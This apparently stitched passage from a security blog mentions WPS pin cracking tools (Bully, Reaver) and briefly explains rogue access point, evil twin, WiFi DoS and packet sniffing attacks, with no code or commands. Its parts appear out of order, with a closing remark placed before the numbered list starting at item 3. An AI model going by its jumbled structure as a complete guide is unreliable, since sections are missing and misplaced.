    Tools Bully and Reaver are first to come to mind when we want to crack WPS pin. However, in our latest tests, both the tools are presenting some problems. You can read our previous articles on Bully and Wifite.

    That was a complete guide to understanding wireless security. Hope our readers now have a better understanding of Wireless security. You can read Part 1 of Understanding Wireless security here. Happy hacking.

    3. Rogue Access Point attack

    A Rogue Access Point is a wireless access point in a secure network but runs without the authorization from the network administrator. If this Rogue Access Point runs with weak security, it can compromise the security of the entire network.

    4. Evil Twin attack

    As the name implies, an evil twin is an access point set with the same name as that of a legitimate Wi-Fi access point.For example, let’s say there is a Wi-Fi access point with name “shunya” that is configured with WPA2 password. Hackers setup another access point with the same name but without a password (open network). Users while trying to connect to the legitimate access point, get connected to this Evil Twin. Evil Twin can be considered as wireless equivalent of the phishing. This is usually done to capture credentials.

    5. WiFi DoS attack

    In a Wi-Fi DoS attack, the wireless access point is flooded with so many packets that it becomes unavailable to genuine users.

    6. WiFi Packet capture attack

    This attack occurs after the hacker gains access to the Wi-Fi network. After gaining access, hackers try to sniff on the traffic of the entire network. Learn more about Packet sniffing.